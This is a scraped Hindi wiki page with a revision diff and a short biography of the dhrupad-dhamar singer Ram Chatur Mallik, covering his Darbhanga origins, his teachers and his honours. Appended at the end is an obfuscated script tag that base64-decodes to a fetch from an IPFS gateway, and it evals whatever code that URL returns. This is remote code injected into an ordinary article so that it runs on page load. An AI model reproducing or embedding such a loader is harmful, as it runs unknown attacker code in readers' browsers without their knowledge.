राम चतुर मल्लिक: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
No edit summary
No edit summary
Line 16: Line 16:
==टीका टिप्पणी और संदर्भ==
==टीका टिप्पणी और संदर्भ==
<references/>
<references/>
[[Category:गायक]][[Category:लोक गायक कलाकार]] [[Category:संगीत कोश]][[Category:कला कोश]]
==संबंधित लेख==
{{शास्त्रीय गायक कलाकार}}
[[Category:गायक]][[Category:शास्त्रीय गायक कलाकार]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:लोक गायक कलाकार]] [[Category:संगीत कोश]][[Category:कला कोश]][[Category:संगीत नाटक अकादमी पुरस्कार]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
__INDEX__
__INDEX__

Revision as of 05:24, 11 January 2013

पंडित राम चतुर मल्लिक (जन्म- 5 अक्टूबर, 1902, बिहार; मृत्यु- 11 जनवरी, 1990) 'भारतीय शास्त्रीय संगीत' की ध्रुपद-धमार शैली के प्रसिद्ध गायक थे। इन्होंने ध्रुपद-धमार गायन शैली में सिर्फ़ भारत में ही नहीं बल्कि विदेशों में भी ख्याति प्राप्त की थी और देश का नाम रोशन किया।

जन्म तथा शिक्षा

राम चतुर मल्लिक 5 अक्टूबर, 1902 को बिहार के दरभंगा ज़िले के अमता गाँव में हुआ था। इनके पिता का नाम पंडित राजित राम था, जो कि दरभंगा महाराज के दरबार में प्रसिद्ध संगीतज्ञ थे। राम चतुर मल्लिक ने अपने चाचा क्षितिजपाल मल्लिक से और बाद में सितार वादक रामेश्वर पाठक से अपनी प्रारम्भिक शास्त्रीय संगीत की शिक्षा ग्रहण की थी। दरभंगा के महाराज ने सन 1924 में इन्हें राज दरबारी नियुक्त किया। महाराजाधिराज कामेश्वर सिंह के अनुज विश्वेश्वर सिंह के साथ 1937 में ये इंग्लैंण्ड और फ्राँस गए और वहाँ अपने शास्त्रीय संगीत से श्रोताओं को मुग्ध किया। वे मोनिया परम्परा और गौंडवानी के प्रतिनिधि गायक थे। उन्हें ठुमरी गायन में बनारस और गया की गायकी में समान दक्षता प्राप्त थी।

पुरस्कार व सम्मान

  • 1949 में आकाशवाणी के प्रथम श्रेणी के विशिष्ट कलाकार के रूप में सम्मानित किए गए।
  • 1953 में डॉ. राजेन्द्र प्रसाद ने इन्हें बिहार संगीत नाटक अकादमी की फेलोशिप प्रदान की।
  • 1957 में बम्बई की 'सुर-श्रृंगार' संसद के द्वारा मानपत्र और ताम्रपत्र प्रदान किया गया।
  • 1964 में बिहार के राज्यपाल ए. एस. आयंगार ने ताम्रपत्र की उपाधि से विभूषित किया। उसी वर्ष संगीता नाटक अकादमी पुरस्कार से भी सम्मानित किया गया।
  • 1976 में फ्राँस सरकार ने इनके ध्रुपद धमार के रिकार्ड को यूनेस्को प्रसारण के लिए चुना।
  • मध्य प्रदेश सरकार ने इन्हें 'तानसेन' की उपाधि, बिहार सरकार ने महामहोपाध्याय की उपाधि, और खेरागढ़ (म.प्र.) ने इन्हें डी लिट् की उपाधि दी।
  • फ्राँस के कुछ संगीत प्रेमी इनकी वीडियों रिकार्डिंग ले गये। जिस पर उन्होंने एक टैलीफ़िल्म तैयार की। फ्राँस, जर्मनी तथा कालम्बिया ने इनके दो रिकार्ड भी जारी किए।
  • ये ध्रुपद, खयाल, ठुमरी और मैथिली लोकगीतों के अनुपम गायक थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>